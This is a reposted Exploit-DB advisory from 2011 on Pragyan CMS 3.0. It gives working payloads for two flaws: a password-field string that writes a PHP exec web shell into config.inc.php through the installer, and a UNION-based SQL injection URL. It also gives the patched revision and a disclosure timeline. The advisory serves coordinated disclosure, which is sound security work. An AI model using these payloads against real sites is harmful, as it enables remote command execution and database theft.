Pragyan CMS 3.0 – Multiple Vulnerabilities

  • 作者: Villy & Abhishek Lyall
    日期: 2011-02-25
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/16247/
  • #Pragyan CMS v 3.0 mutiple Vulnerabilities
    #Author Villy and Abhishek Lyall - villys777[at]gmail[dot]com,
    abhilyall[at]gmail[dot]com
    #Web - http://www.aslitsecurity.com/
    #Blog - http://bugix-security.blogspot.com
    #http://www.aslitsecurity.blogspot.com/
    #Pragyan CMS v 3.0
    
    Technical Description
    
    
    1) Code execution in INSTALL/install.php
    script not correctly validate entered fields.
    possibility to write at password field string:
    
    ");echo exec($_GET["a"]);echo ("
    
    or in another fields with turned of javascript.
    in cms/config.inc.php will be code:
    define("MYSQL_PASSWORD","");echo exec($_GET["a"]);echo ("");
    which allows command execution.
    
    EXPLOIT:: http://target.com/blog/cms/config.inc.php?a=ls -la
    
    2) sql injection
    - get mysql version EXPLOIT::
    http://target.com/path/+view&thread_id=-1 UNION ALL SELECT
    null,null,null,null,concat(unhex(Hex(cast(@@version as
    char)))),null,null,null--
    
    Solution
    update to Pragyan CMS 3.0 rev.274
    
    Changelog
    2011-19-02 : Initial release
    2011-20-02 : Reported to vendor
    2011-25-02 : patch released
    2011-25-02 : public disclose
    
    Credits
    Villy
    Abhishek Lyall
    pragyan.org
    http://bugix-security.blogspot.com
    http://www.aslitsecurity.blogspot.com/
    
    
    Abhishek Lyall